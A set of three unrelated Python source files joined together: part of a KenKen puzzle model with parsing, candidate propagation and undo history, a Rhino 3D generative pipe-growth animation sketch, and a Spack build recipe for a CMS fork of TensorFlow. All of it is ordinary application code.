solution = "Solution" + OneOrMore(integer)("soln")
dimension ="dim" + integer("dim")
puzzle = dimension + cages + solution
puzzle.ignore(pythonStyleComment)
return puzzle.parseFile(fin, parseAll = True)
def parseKip(self, fin):
# parser for .kip files
operator = oneOf("ADD SUB MUL DIV NONE")
integer = Word(nums)
lbrack = Suppress('[')
rbrack = Suppress(']')
cage = Group( operator("oper") + integer("value") +\
lbrack + OneOrMore(integer)("cells") + rbrack +\
integer("color") )
cages = OneOrMore(cage)("cages")
update = Group( integer("coords") + integer("answer") +integer("candidates") )
annal = "checkpoint" ^ update
history = "History" + OneOrMore(annal)("history")
dimension ="dim" + integer("dim")
solution = "Solution" + OneOrMore(integer)("soln")
answer = "Answers" + OneOrMore(integer)("answer")
candidates = "Candidates" + OneOrMore(integer)("candidates")
time = "Time" + integer("time")
puzzle = dimension + cages + solution + answer + candidates + history + time
puzzle.ignore(pythonStyleComment)
return puzzle.parseFile(fin, parseAll = True)
def enterAnswer(self, focus, value):
# User enters an answer in a cell.
# If the answer conflicts with a value already entered in another cell,
# or this answer completes a cage, and the arithmetic is wrong,
# raise AnswerError.
# If the user is entering (or changing) an answer, compute all resulting
# inferences, enter them in the history, and return a list of all cells
# whose values change (whether answers or candidates.)
# If the user is simply reentering the same answer in a cell, do nothing
# and return an empty list of updates.
history = self.history
dim, answer = self.dim, self.answer
if answer[focus] == value:
return []
row = [x for x in range(1, dim+1) if answer[(x, focus[1])] == value]
col = [y for y in range(1, dim+1) if answer[(focus[0], y)] == value]
cells = [(x, focus[1]) for x in row] + [(focus[0], y) for y in col]
if cells:
raise AnswerError(cells)
cage = self.cageID[focus]
if len([x for x in cage if x != focus and answer[x]]) == len(cage) - 1:
if not self.goodAnswer(cage, focus, value):
raise AnswerError(cage)
self.isDirty = True
history.append(Checkpoint())
updates = self.propagate(focus, value)
for upd in updates:
history.append( Update(upd.coords, upd.answer, upd.candidates) )
return updates
def annal(self, focus):
return Update(focus, self.answer[focus], self.candidates[focus][:])
def propagate(self, focus, value):
# When an answer is entered in a cell, eliminate that value as a
# candidate in all cells in the same line.
# In cases where that reduces then number of candidates to one,
# enter the answer and recursively propagate it.
# All changes are entered in the history.
# A list of changes is returned
candidates, answer = self.candidates, self.answer
history, dim = self.history, self.dim
x, y = focus
updates = []
ann = self.annal(focus)
history.append(ann)
answer[focus] = value
updates.append(self.annal(focus))
for k in range(1, dim+1):
for coords in ( (x, k), (k, y) ):
if answer[coords]:
continue
cand = candidates[coords]
if value not in cand:
continue
if len(cand) == 2:
# the element != value equals sum(cand) - value
updates.extend(self.propagate(coords, sum(cand)-value))
else:
ann = self.annal(coords)
history.append(ann)
candidates[coords].remove(value)
updates.append(self.annal(coords))
return updates
def allCandidates(self, focus):
# Enter all possible candidates in cell given by focus
# Ignore if answer already in cell
# Enter transaction in history and return a list of updates
history, dim, answer = self.history, self.dim, self.answer
if answer[focus]:
return []
ann = self.annal(focus)
self.isDirty = True
history.append(Checkpoint())
history.append(ann)
cand = range(1, dim+1)
x, y = focus
for k in range(1, dim+1):
try:
cand.remove(answer[x, k])
except ValueError:
pass
try:
cand.remove(answer[k, y])
except ValueError:
pass
if len(cand) != 1:
self.candidates[focus] = cand
update = self.annal(focus)
return [update] # only one update
else:
updates = self.propagate(focus, cand[0])
for upd in updates:
history.append( Update(upd.coords, upd.answer, upd.candidates) )
return updates
def fillAllCandidates(self):
# For each cell withpout an answer or any candidates, enter
# all possible candidates
# Enter transaction in history and return a list of updates
candidates, answer, history = self.candidates, self.answer, self.history
history.append(Checkpoint()) # assume there will be an update
dirty = self.isDirty # save current state
self.isDirty = True
rng = range(1, self.dim+1)
updates = []
cells = [(x, y) for x in rng for y in rng]
for cell in cells:
if answer[cell] or candidates[cell]:
continue
ann = self.annal(cell)
history.append(ann)
cand = rng[:]
x, y = cell
for k in rng:
try:
cand.remove(answer[x, k])
except ValueError:
pass
try:
cand.remove(answer[k, y])
except ValueError:
pass
if len(cand) != 1:
self.candidates[cell] = cand
update = self.annal(cell)
updates.append(update)
else:
ups = self.propagate(cell, cand[0])
updates.extend(ups)
for upd in ups:
history.append( Update(upd.coords, upd.answer, upd.candidates) )
if not updates:
history.pop() # remove the checkpoint
self.isDirty = dirty # restore state
return updates
def toggleCandidate(self, focus, value):
# Ignore if answer already in focus cell.
# Otherwise, toggle the candidate value on or off.
# If the user attempte to enter a value that is laready an
# answer in the same line, raise CandidateError.
# Enter transaction in history and return a list of updates
history, dim, answer, candidates = (
self.history, self.dim, self.answer, self.candidates)
if answer[focus]: # answer present
return []
ann = self.annal(focus)
if value in candidates[focus]: # toggle value off
self.isDirty = True
history.append(Checkpoint())
history.append(ann)
candidates[focus].remove(value)
update = self.annal(focus)
return [update] # only one update
conflicts = [] # toggle value on --
x, y = focus # check for conflicts
for k in range(1, dim+1):
for coords in ( (x, k), (k, y) ):
if answer[coords] == value:
conflicts.append(coords)
if conflicts: # conflict found
raise CandidateError(conflicts)
self.isDirty = True
history.append(Checkpoint()) # no conflicts, toggle value on
history.append(ann)
candidates[focus].append(value)
update = self.annal(focus)
return [update] # only one update
def getAllEntries(self):
# Return a list of updates for all cell that have a value (answer or candidate).
# Used for initializing the board, whether for one-cell cages or loading a
# partially-completed solution.
dim = self.dim
answer, candidates = self.answer, self.candidates
updates = []
for j in range(1, dim+1):
for k in range(1, dim+1):
if answer[(j, k)] or candidates[(j, k)]:
updates.append(self.annal( (j, k) ))
return updates
def undo(self):
# Undo items from the history until a checkpoint is encountered
# Return a list of the updates made
answer, candidates, history = self.answer, self.candidates, self.history
try:
ann = history.pop()
except IndexError: # user tried one too many undos
return []
updates = []
self.isDirty = True
while not isinstance(ann, Checkpoint):
coords = ann.coords
answer[coords] = ann.answer
candidates[coords] = ann.candidates
updates.append(ann)
ann = history.pop()
return updates
def clearCell(self, focus):
# If there is an answer in the current cell clear it.
# If there is no answer, clear the candidate list.
# Return a list of updates
answer, candidates, history = self.answer, self.candidates, self.history
if not answer[focus] and not candidates[focus]:
return [] # nothing to clear
ann = self.annal(focus)
if answer[focus]:
answer[focus] = 0
else:
candidates[focus] = []
self.isDirty = True
history.append(Checkpoint())
history.append(ann)
return [self.annal(focus)]
def clearAllCandidates(self):
# For each cell withpout an answer, clear all candidates
# Enter transaction in history and return a list of updates
candidates, answer, history = self.candidates, self.answer, self.history
history.append(Checkpoint()) # assume there will be an update
dirty = self.isDirty # save current state
self.isDirty = True
rng = range(1, self.dim+1)
updates = []
cells = [(x, y) for x in rng for y in rng]
for cell in cells:
if answer[cell] or not candidates[cell]:
continue # nothing to clear
ann = self.annal(cell)
history.append(ann)
candidates[cell] = []
updates.append(self.annal(cell))
if not updates:
history.pop() # remove the checkpoint
self.isDirty = dirty # restore state
return updates
def checkAnswers(self):
# Compare user's answers to solution, and return a list of errors
dim, answer, solution = self.dim, self.answer, self.solution
errors = []
for x in range(1, dim+1):
for y in range(1, dim+1):
if answer[(x,y)] and answer[(x,y)] != solution[(x,y)]:
errors.append( (x,y) )
return errors
def isCompleted(self):
# Has user entered answer in each cell?
if len([x for x in self.answer.values() if x]) == self.dim ** 2:
return True
else:
return False
def save(self, fname):
dim = self.dim
elapsedTime = self.parent.control.getTime()
fout = file(fname, 'w')
fout.write('# %s\n' % os.path.split(fname)[1])
fout.write('# %s\n' % time.strftime("%A, %d %B %Y %H:%M:%S"))
fout.write('dim %d\n' % dim)
for c in self.cages:
fout.write(c.__str__() + '\n')
fout.write('#\nSolution\n')
for row in range(1, dim+1):
for col in range(1, dim+1):
fout.write( '%d ' %self.solution[(row, col)] )
fout.write('\n')
fout.write('#\nAnswers\n')
for row in range(1, dim+1):
for col in range(1, dim+1):
fout.write( '%d ' %self.answer[(row, col)] )
fout.write('\n')
fout.write('#\nCandidates\n')
for row in range(1, dim+1):
for col in range(1, dim+1):
cand = self.candidates[(row, col)]
cstr = ''.join([str(c) for c in cand])
fout.write('%s ' % (cstr if cstr else '0') )
fout.write('\n')
fout.write('#\nHistory\n')
for h in self.history:
if isinstance(h, Checkpoint):
fout.write('checkpoint\n')
else:
fout.write('%d%d ' % h.coords)
fout.write('%d ' % h.answer)
cstr = ''.join([str(c) for c in h.candidates])
fout.write('%s\n' % (cstr if cstr else '0') )
fout.write('#\nTime %d\n' % elapsedTime)
fout.close()
def restart(self):
# Clear all user-entered data
# User wants to start over
dim = self.dim
for i in range(1, dim+1):
for j in range(1, dim+1):
self.candidates[(i,j)] = []
if (i, j) not in self.oneCellCages:
self.answer[(i,j)] = 0
self.history = []
def goodAnswer(self, cage, focus, value):
# Precondition: Evey cell in cage, except focus, has an answer filled in
# Return true iff filling value into focus makes the
# arithmetic work out
operands = [self.answer[x] for x in cage if x != focus]
operands += [value]
if cage.op == "ADD":
return sum(operands) == cage.value
if cage.op == "SUB":
return max(operands) - min(operands) == cage.value
if cage.op == "MUL":
product = 1
for x in operands:
product *= x
return product == cage.value
if cage.op == "DIV":
return max(operands) // min(operands) == cage.value
if cage.op == "NONE":
return operands[0] == cage.value
if __name__ == '__main__':
p = Puzzle('../docs/31May2009.ken')
|
"""300 Days of Code
Sketches 201-300 by Tim Williams
"""
import Rhino as rc
import Rhino.Geometry as rg
import rhinoscriptsyntax as rs
import scriptcontext as sc
import math
import random
import os
import System.Drawing as drawing
import time
import datetime
import clr; clr.AddReference("Grasshopper")
import Grasshopper as gh
from itertools import combinations as cb
import itertools
import lib.color as color
import lib.mp4 as mp4
import lib.geometry as geo
import lib.util as util
import lib.perlin as perlin
import lib.region as region
class TempDisplay():
def __init__(self, objs = [], color = drawing.Color.Gold):
self.attr = rc.DocObjects.ObjectAttributes()
self.attr.ColorSource = rc.DocObjects.ObjectColorSource.ColorFromObject
self.attr.ObjectColor = color
self.Enabled = True
self.guids = []
if type(objs) != list:
objs = [objs]
self.Add(objs, color)
def Add(self, objs, color = None):
if self.Enabled == False: return
oldColor = self.attr.ObjectColor
if type(objs) != list:
objs = [objs]
for obj in objs:
if type(obj) == rg.Point3d:
self.guids.append(sc.doc.Objects.AddPoint(obj, self.attr))
elif type(obj) == rg.LineCurve or type(obj) == rg.PolylineCurve:
self.guids.append(sc.doc.Objects.AddCurve(obj, self.attr))
else:
print "Cannot add temp obj, type not supported"
def Cleanup(self):
for id in self.guids:
sc.doc.Objects.Delete(id, True)
class Scene():
def __init__(self):
self.floorID = r'ec68de3f-0f6f-4c67-95e9-cb86d8a13d7e'
self.floor = rs.coercesurface(self.floorID)
class HUD():
def __init__(self, skNum, numFrames):
self.numFrames = numFrames
self.skNumID = r'9307b2df-e6e2-4c74-8671-b350783d5ff0'
self.textID = r'7bd51e90-2a02-4532-ab53-563ec9ad6351'
self.param1ID = r'806cc725-66fb-4d1e-b58e-399232a82585'
self.param2ID = r'0f1272f2-e148-44e6-8aad-6c4df5ddd485'
self.param3ID = r'b5089d05-07b4-460c-ae65-8ffcb8b3e8f7'
self.skNum = rs.coercerhinoobject(self.skNumID)
self.param1 = rs.coercerhinoobject(self.param1ID)
self.param2 = rs.coercerhinoobject(self.param2ID)
self.param3 = rs.coercerhinoobject(self.param3ID)
self.text = rs.coercerhinoobject(self.textID)
self.progressBarID = r'e0ac605f-ff4d-471d-a5eb-65e1f8b6be94'
self.progress = rs.coercerhinoobject(self.progressBarID).BrepGeometry
self.plane = rg.Plane.WorldXY
self.plane.Origin = rg.Point3d(5,100,85.913)
self.skNum.Geometry.Text = 'sk'+str(skNum)
self.skNum.CommitChanges()
self.param1.Geometry.Text = ' '
self.param1.CommitChanges()
self.param2.Geometry.Text = ' '
self.param2.CommitChanges()
self.param3.Geometry.Text = ' '
self.param3.CommitChanges()
bbox = self.progress.GetBoundingBox(rg.Plane.WorldXY)
currLength = bbox.Max.X - bbox.Min.X
xScale = 1 / currLength
xform = rg.Transform.Scale(self.plane, xScale, 1, 1)
self.progress.Transform(xform)
sc.doc.Objects.Replace(rs.coerceguid(self.progressBarID), self.progress)
def Update(self, frameNum):
self.text.Geometry.Text = str(frameNum)
self.text.CommitChanges()
def UpdateParam1(self, paramData):
self.param1.Geometry.Text = str(paramData)
self.param1.CommitChanges()
def UpdateParam2(self, paramData):
self.param2.Geometry.Text = str(paramData)
self.param2.CommitChanges()
def UpdateParam3(self, paramData):
self.param3.Geometry.Text = str(paramData)
self.param3.CommitChanges()
def UpdateScaleBar(self):
stepSize = 90/self.numFrames
self.progress = rs.coercerhinoobject(self.progressBarID).BrepGeometry
bbox = self.progress.GetBoundingBox(rg.Plane.WorldXY)
currLength = bbox.Max.X - bbox.Min.X
xScale = (currLength + stepSize) / currLength
xform = rg.Transform.Scale(self.plane, xScale, 1, 1)
self.progress.Transform(xform)
sc.doc.Objects.Replace(rs.coerceguid(self.progressBarID), self.progress)
######
class System():
def __init__(self):
self.particles = []
self.boundary = rg.Box(rg.Plane.WorldXY, rg.Interval(0,100), rg.Interval(0,100), rg.Interval(0,100))
self.boundary = self.boundary.ToBrep()
initPlane = rg.Plane.WorldXY
initPlane.Origin = rg.Point3d(50,50,50)
self.majorBrep = rg.Brep()
self.openPlanes = []
self.deadPlanes = []
self.nextRoundPlanes = [initPlane]
self.modules = []
self.size = 1
self.time = 0
self.attr = rc.DocObjects.ObjectAttributes()
self.attr.ColorSource = rc.DocObjects.ObjectColorSource.ColorFromObject
self.attr.MaterialSource = rc.DocObjects.ObjectMaterialSource.MaterialFromObject
grad = color.GetGradient(5)
self.attr.ObjectColor = color.GradientOfColors(grad, 0)
self.attr.ObjectColor = drawing.Color.White
index = sc.doc.Materials.Add()
self.mat = sc.doc.Materials[index]
self.mat.DiffuseColor = self.attr.ObjectColor
self.mat.CommitChanges()
self.attr.MaterialIndex = index
self.pipes = []
for i in range(1):
self.pipes.append(Pipe(self))
def Update(self, time):
self.time = time
self.openPlanes = self.nextRoundPlanes
random.shuffle(self.openPlanes)
openPlanes = self.openPlanes[:8]
self.deadPlanes = self.openPlanes[8:]
self.openPlanes = openPlanes
self.nextRoundPlanes = []
planesToRemove = []
#size = util.Remap(self.time, 0,150,5,1)
numToAdd = 0
pipesToRemove = []
for pipe in self.pipes:
if pipe.alive:
pipe.Update(time)
if pipe.alive == False:
pipesToRemove.append(pipe)
for pipe in self.pipes:
if pipe.alive:
pipe.UpdateDisplay()
for pipe in pipesToRemove:
self.pipes.append(Pipe(self))
#for plane in self.openPlanes:
# planesToRemove.append(plane)
# #self.AddModule(plane, size)
# self.AddModule2(plane, self.size)
#for plane in planesToRemove:
# self.openPlanes.remove(plane)
#for plane in self.deadPlanes:
# sc.doc.Objects.AddSphere(rg.Sphere(plane, self.size), self.attr)
def UpdateDisplay(self):
pass
def AddModule(self, plane, size):
safety = 0
while True:
safety += 1
if safety > 10:
self.deadPlanes.append(plane)
return
mod = Module(size)
case = random.randint(0,2)
if self.time < 5:
case = 0
if case == 0:
mod.CreateStraight()
elif case == 1:
mod.CreateAngle()
elif case == 2:
mod.CreateT()
originPlane = rg.Plane.WorldXY
rot = random.randint(0,3) * 90
#rot = random.uniform(0,360)
rotXform = rg.Transform.Rotation(math.radians(rot), rg.Vector3d(0,0,1), rg.Point3d(0,0,0))
originPlane.Transform(rotXform)
xform = rg.Transform.PlaneToPlane(originPlane, plane)
mod.geo.Transform(xform)
results = rg.Intersect.Intersection.BrepBrep(mod.geo, self.boundary, sc.doc.ModelAbsoluteTolerance)
if len(results[1]) == 0:
results = rg.Intersect.Intersection.BrepBrep(mod.geo, self.majorBrep, sc.doc.ModelAbsoluteTolerance)
if len(results[1]) < 2:
sc.doc.Objects.AddBrep(mod.geo, self.attr)
ends = mod.planeEnds[:]
for end in ends:
end.Transform(xform)
self.nextRoundPlanes += ends
self.majorBrep.Append(mod.geo)
return
def AddModule2(self, plane, size):
numObjects = 1
if random.randint(0,4) == 0:
numObjects = 2
for i in range(numObjects):
#Rotate base plane
plane.Rotate(math.radians(random.uniform(0,360)), plane.Normal)
#Construct new arc
length = 4
vec = plane.Normal
vec *= length
pt0 = plane.Origin
pt1 = rg.Point3d.Add(pt0, vec)
vec.Rotate(math.radians(random.uniform(-120,120)), plane.XAxis)
vec.Unitize()
vec *= length
pt2 = rg.Point3d.Add(pt1, vec)
nurb = rg.NurbsCurve.Create(False, 2, [pt0, pt1, pt2])
tan = nurb.TangentAt(1)
circ = rg.Circle(plane, self.size)
circ = circ.ToNurbsCurve()
sweep = rg.SweepOneRail()
geo = sweep.PerformSweep(nurb, circ)[0]
results = rg.Intersect.Intersection.BrepBrep(geo, self.boundary, sc.doc.ModelAbsoluteTolerance)
if len(results[1]) == 0:
endPlane = [rg.Plane(pt2, tan)]
sc.doc.Objects.AddBrep(geo, self.attr)
self.nextRoundPlanes += endPlane
class Pipe():
def __init__(self, system, vec = None):
self.system = system
self.majorBrep = rg.Brep()
self.alive = True
self.age = 0
self.history = []
self.segments = []
#Movement
#self.vel = rg.Vector3d(random.uniform(-1,1),random.uniform(-1,1), random.uniform(-.2,.2))
#self.vel.Unitize()
#self.size = random.uniform(1, 3)
self.size = .1
self.length = .75
#Color and Material
self.attr = rc.DocObjects.ObjectAttributes()
self.attr.ColorSource = rc.DocObjects.ObjectColorSource.ColorFromObject
#self.grad = color.GetGradient(random.randint(0,9))
self.grad = color.GetGradient(4)
#col = drawing.Color.AliceBlue
col = color.GradientOfColors(self.grad, random.uniform(0,1))
self.attr.MaterialSource = rc.DocObjects.ObjectMaterialSource.MaterialFromObject
self.attr.ObjectColor = col
index = sc.doc.Materials.Add()
self.mat = sc.doc.Materials[index]
self.mat.DiffuseColor = self.attr.ObjectColor
self.mat.CommitChanges()
self.attr.MaterialIndex = index
#Position
self.pos = rg.Point3d(random.uniform(5,95), random.uniform(5,95), .1)
#self.pos = rg.Point3d(50, 50, 99)
self.dir = rg.Vector3d(0,0,1)
initPlane = rg.Plane.WorldXY
initPlane.Origin = self.pos
initPlane = rg.Plane(self.pos, self.dir)
self.openPlanes = []
self.planesToRemove = []
self.nextRoundPlanes = [initPlane]
self.crv = None
self.crvs = rc.Collections.CurveList()
self.pts = []
self.ids = []
sc.doc.Objects.AddSphere(rg.Sphere(self.pos, self.size), self.attr)
def Update(self, time):
self.time = time
self.age += 1
#self.size = util.Remap(self.age, 0, 150, .1, 5)
self.openPlanes = self.nextRoundPlanes
random.shuffle(self.openPlanes)
openPlanes = self.openPlanes[:8]
self.deadPlanes = self.openPlanes[8:]
self.openPlanes = openPlanes
self.nextRoundPlanes = []
planesToRemove = []
for plane in self.openPlanes:
#Rotate base plane
plane.Rotate(math.radians(random.uniform(0,360)), plane.Normal)
#Construct new arc
vec = plane.Normal
vec *= self.length
pt0 = plane.Origin
pt1 = rg.Point3d.Add(pt0, vec)
closestDist = None
closestPt = None
for otherPipe in self.system.pipes:
if otherPipe is self: continue
for eachCrv in otherPipe.crvs:
result, param = eachCrv.ClosestPoint(pt1, 20)
if result:
closePt = eachCrv.PointAt(param)
d = rs.Distance(pt1, closePt)
if d < self.length*2:
if d < closestDist or closestDist is None:
closestDist = d
closestPt = closePt
if closestPt:
pt2 = closestPt
self.alive = False
#print "Joined"
else:
#vec.Rotate(math.radians(random.uniform(-90,90)), plane.XAxis)
safety = 0
while True:
safety += 1
if safety > 10:
break
vec.Rotate(math.radians(random.uniform(-5,5)), plane.XAxis)
vec.Unitize()
vec *= self.length
pt2 = rg.Point3d.Add(pt1, vec)
if self.age > 5:
results = self.system.boundary.ClosestPoint(pt2, 20)
if results[0]:
d = rs.Distance(pt2, results[1])
if d < 5:
continue
else:
break
nurb = rg.NurbsCurve.Create(False, 2, [pt0, pt1, pt2])
tan = nurb.TangentAt(1)
circ = rg.Circle(plane, self.size)
circNurb = circ.ToNurbsCurve()
sweep = rg.SweepOneRail()
geo = sweep.PerformSweep(nurb, circNurb)[0]
results = rg.Intersect.Intersection.BrepBrep(geo, self.system.boundary, sc.doc.ModelAbsoluteTolerance)
if len(results[1]) == 0:
self.pts.append(pt1)
self.pts.append(pt2)
self.crvs.Add(nurb)
self.history.append(circ)
self.segments.append(Segment(self, circ, plane, nurb, self.size))
endPlane = [rg.Plane(pt2, tan)]
self.nextRoundPlanes += endPlane
for plane in planesToRemove:
self.openPlanes.remove(plane)
for plane in self.deadPlanes:
sc.doc.Objects.AddSphere(rg.Sphere(plane, self.size), self.attr)
if len(self.nextRoundPlanes) == 0:
self.alive = False
sc.doc.Objects.AddSphere(rg.Sphere(plane.Origin, self.size), self.attr)
def UpdateDisplay(self):
for segment in self.segments:
segment.UpdateDisplay()
class Segment():
def __init__(self, parent, circ, plane, path, size):
self.size = size
self.parent = parent
self.circ = circ
self.plane = plane
self.path = path
self.id = None
def UpdateDisplay(self):
if self.id:
sc.doc.Objects.Delete(self.id, True)
growthRate = .1
xform = rg.Transform.Scale(self.plane.Origin, (self.size + growthRate) / self.size)
self.size += growthRate
self.circ.Transform(xform)
newCircNurb = self.circ.ToNurbsCurve()
sweep = rg.SweepOneRail()
geo = sweep.PerformSweep(self.path, newCircNurb)[0]
self.id = sc.doc.Objects.AddBrep(geo, self.parent.attr)
class Module():
def __init__(self, size):
self.planeStart = rg.Plane.WorldXY
self.geo = None
self.cylinderGeo = None
self.angleGeo = None
self.uTurnGeo = None
self.geoID = None
self.size = size
self.length = size*1.5
self.sec = rg.Rectangle3d(self.planeStart, rg.Interval(-self.size/2, self.size/2), rg.Interval(-self.size/2, self.size/2))
self.sec = self.sec.ToNurbsCurve()
self.sec.Reverse()
self.sec = rg.Circle(rg.Plane.WorldXY, self.size/2)
self.sec = self.sec.ToNurbsCurve()
self.sec.Reverse()
self.attr = rc.DocObjects.ObjectAttributes()
self.attr.ColorSource = rc.DocObjects.ObjectColorSource.ColorFromObject
self.attr.MaterialSource = rc.DocObjects.ObjectMaterialSource.MaterialFromObject
col = color.GetRandomNamedColor()
self.attr.ObjectColor = col
index = sc.doc.Materials.Add()
self.mat = sc.doc.Materials[index]
self.mat.DiffuseColor = self.attr.ObjectColor
self.mat.CommitChanges()
self.attr.MaterialIndex = index
self.planeEnds = []
def CreateNurbs(self):
pass
def CreateStraight(self):
pt = rg.Point3d(0,0,self.length)
planeEnd = rg.Plane.WorldXY
planeEnd.Origin = pt
self.planeEnds.append(planeEnd)
self.geo = rg.Extrusion.Create(self.sec, -self.length, True)
self.geo = self.geo.ToBrep(False)
def CreateAngle(self):
pt = rg.Point3d(self.length, 0, self.length)
planeEnd = rg.Plane.WorldYZ
planeEnd.Origin = pt
self.planeEnds.append(planeEnd)
centerPt = rg.Point3d(self.length, 0, 0)
origin = rg.Point3d(0,0,0)
centerPlane = rg.Plane(centerPt, origin, pt)
circ = rg.Circle(centerPlane, self.length)
arc = rg.Arc(circ, math.pi*.5)
arc = arc.ToNurbsCurve()
sweep = rg.SweepOneRail()
self.geo = sweep.PerformSweep(arc, self.sec)[0]
def CreateUturn(self):
xDir = rg.Vector3d(-1,0,0)
yDir = rg.Vector3d(0,1,0)
planeEnd = rg.Plane(rg.Point3d(self.length*2, 0, 0), xDir, yDir)
self.planeEnds.append(planeEnd)
pt = rg.Point3d(self.length,0,self.length)
centerPt = rg.Point3d(self.length, 0, 0)
origin = rg.Point3d(0,0,0)
centerPlane = rg.Plane(centerPt, origin, pt)
circ = rg.Circle(centerPlane, self.length)
arc = rg.Arc(circ, math.pi)
arc = arc.ToNurbsCurve()
sweep = rg.SweepOneRail()
self.geo = sweep.PerformSweep(arc, self.sec)[0]
def CreateT(self):
geo0 = rg.Extrusion.Create(self.sec, -self.length + self.length/2, True)
geo0 = geo0.ToBrep(False)
sweepCenterPt = rg.Point3d(self.length, 0, 0)
origin = rg.Point3d(0,0,0)
pt = rg.Point3d(self.length, 0, self.length)
centerPlane = rg.Plane(sweepCenterPt, origin, pt)
circ = rg.Circle(centerPlane, self.length)
arc = rg.Arc(circ, math.pi*.5)
arc = arc.ToNurbsCurve()
sweep = rg.SweepOneRail()
geo1 = sweep.PerformSweep(arc, self.sec)[0]
geo1 = geo1.CapPlanarHoles(sc.doc.ModelAbsoluteTolerance)
rotXform = rg.Transform.Rotation(math.radians(180), rg.Vector3d(0,0,1), rg.Point3d(0,0,0))
pt = rg.Point3d(self.size/2, 0, self.length/2)
planeEnd = rg.Plane.WorldYZ
planeEnd.Origin = pt
self.planeEnds.append(planeEnd)
pt = rg.Point3d(self.size/2, 0, self.length/2)
planeEnd = rg.Plane.WorldYZ
planeEnd.Origin = pt
planeEnd.Transform(rotXform)
self.planeEnds.append(planeEnd)
planeXform = rg.Transform.PlaneToPlane(rg.Plane.WorldXY, planeEnd)
tempCirc = self.sec.Duplicate()
tempCirc.Transform(planeXform)
geo1 = rg.Extrusion.Create(tempCirc, self.size, True)
geo1 = geo1.ToBrep(False)
union = rg.Brep()
results = union.CreateBooleanUnion([geo0, geo1], sc.doc.ModelAbsoluteTolerance)
self.geo = results[0]
####
def main():
skNum = (datetime.date.today()-datetime.date(2020, 03, 29)).days + 201
if int(skNum) > int(os.path.splitext(os.path.basename(__file__))[0]):
print "!!!!SAVE THE SKETCH WITH A NEW NAME!!!!"
rs.UnselectAllObjects()
init_time = time.time()
version = 'a'
anim = mp4.Animation(os.path.splitext(os.path.basename(__file__))[0] + version)
numFrames = 150
numPasses = 100
anim.fps = 30
td = TempDisplay()
display = HUD(os.path.splitext(os.path.basename(__file__))[0], numFrames)
s = Scene()
################################
#SETUP
pSystem = System()
################################
for i in range(numFrames):
start_time = time.time()
print "Frame {}".format(i)
if sc.escape_test(False): anim.Cleanup(); return
################################
#MAIN LOOP
if random.randint(0,20) == 0:
pSystem.pipes.append(Pipe(pSystem))
pSystem.Update(i)
################################
#HUD
display.UpdateParam1('open: ' + str(len(pSystem.pipes)))
#display.UpdateParam2('y: ' + str(ball.pos.Y))
#display.UpdateParam3('z: ' + str(ball.pos.Z))
display.UpdateScaleBar()
################################
sc.doc.Views.Redraw()
display.Update(i)
anim.AddFrame(numberOfPasses = numPasses)
################################
#Framerate
frameTime = time.time() - start_time
timeLeft = (numFrames - i) * frameTime
timeLeftStr = str(datetime.timedelta(seconds=timeLeft))
print "Time remaining: {}".format(timeLeftStr)
frameTime = time.time() - init_time
timeLeftStr = str(datetime.timedelta(seconds=frameTime))
print "Total Time: {}".format(timeLeftStr)
if int(skNum) > int(os.path.splitext(os.path.basename(__file__))[0]):
print "!!!!SAVE THE SKETCH WITH A NEW NAME!!!!"
if os.path.isdir(r"D:\Files\Work\LIBRARY\06_RHINO\10_Python\300 DAYS\anim"):
anim.Create(r"D:\Files\Work\LIBRARY\06_RHINO\10_Python\300 DAYS\anim", frames2Keep = [i/2, i-1])
else:
anim.Create(r"C:\Tim\300 Days\anim", frames2Keep = [i/2, i-1])
if __name__ == "__main__":
main()
|
##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
from llnl.util.filesystem import *
import os
import tarfile
def relinstall(f, target):
if os.path.isfile(f) and not os.path.islink(f):
rp=os.path.relpath(os.path.dirname(f))
mkdirp('%s/%s' % (target,rp))
install(f, '%s/%s' % (target, rp))
class TensorflowCms(Package):
"""
TensorFlow is an open source software library for numerical computation using data flow graphs
"""
homepage = "https://www.tensorflow.org/"
version('1.6.0', git='https://github.com/cms-externals/tensorflow.git',
commit='6eea62c87173ad98c71f10ff2f796f6654f5b604')
depends_on('bazel@0.11.0', type='build')
depends_on('swig', type='build')
depends_on('python', type='build')
depends_on('py-numpy')
depends_on('py-wheel')
depends_on('py-pip')
depends_on('eigen')
depends_on('protobuf')
patch('tensorflow-1.6.0-rename-runtime.patch')
def setup_environment(self, spack_env, run_env):
spack_env.set('TF_NEED_S3', '0')
spack_env.set('TF_NEED_GCP', '0')
spack_env.set('TF_NEED_HDFS', '0')
spack_env.set('TF_NEED_JEMALLOC','0')
spack_env.set('TF_NEED_KAFKA', '0')
spack_env.set('TF_NEED_OPENCL_SYCL', '0')
spack_env.set('TF_NEED_COMPUTECPP', '0')
spack_env.set('TF_NEED_OPENCL', '0')
spack_env.set('TF_CUDA_CLANG', '0')
spack_env.set('TF_NEED_TENSORRT', '0')
spack_env.set('TF_ENABLE_XLA', '0')
spack_env.set('TF_NEED_GDR', '0')
spack_env.set('TF_NEED_VERBS', '0')
spack_env.set('TF_NEED_CUDA', '0')
spack_env.set('TF_NEED_MKL', '0')
spack_env.set('TF_NEED_MPI', '0')
spack_env.set('TF_SET_ANDROID_WORKSPACE', '0')
spack_env.set('CC_OPT_FLAGS', '-march=core2')
spack_env.set('CXX_OPT_FLAGS', '-std=c++11')
spack_env.set('USE_DEFAULT_PYTHON_LIB_PATH', '1')
spack_env.set('PYTHON_BIN_PATH', '%s/python' % self.spec['python'].prefix.bin )
spack_env.set('PYTHONUSERBASE', '%s' % self.spec.prefix)
def install(self, spec, prefix):
base='--output_base=%s/base'%self.stage.path
user_root='--output_user_root=%s/user_root'%self.stage.path
filename=join_path(self.stage.path,'tensorflow','.bazelrc')
with open(filename,'w') as f:
f.write('startup '+base+' '+user_root+'\n')
configure()
